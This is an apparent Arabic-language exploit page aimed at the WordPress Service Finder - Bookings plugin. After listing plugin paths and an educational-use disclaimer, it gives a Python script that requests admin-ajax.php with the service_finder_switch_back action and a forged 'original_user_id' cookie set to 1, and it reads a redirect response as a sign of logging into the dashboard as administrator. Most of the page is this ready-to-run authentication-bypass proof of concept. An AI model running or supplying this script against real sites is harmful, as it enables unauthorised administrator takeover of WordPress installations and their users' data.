
إكسبلويت مصغّر لإضافة Service Finder - Bookings الخاصة بووردبريس
إضافة Service Finder هي نظام حجز وإدارة خدمات لمنصة ووردبريس.
نظرًا لشعبيتها وتعقيدها، فقد شهدت بعض الإصدارات مشاكل أمنية تتعلق بـ نقاط نهاية AJAX غير الموثّقة أو ضعف ضوابط الوصول.
يشرح هذا الملف كيف يمكن للباحثين فحص التثبيتات بأمان واتباع الممارسات الأخلاقية (dbr krk).
/wp-content/plugins/service-finder/
/wp-content/plugins/service-finder-bookings/
/wp-content/plugins/sf-booking/
⚠️ إخلاء مسؤولية:
هذه العمليات مخصصة لأغراض تعليمية وبحثية فقط. لا تحاول الوصول غير المصرح به أو الاستغلال.
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
300-399: ✅ ثغرة! إعادة توجيه إلى لوحة التحكم كمسؤول400-499: ⚠️ خطأ من العميل — الطلب غير صالح أو غير مصرح به، وليس ثغرة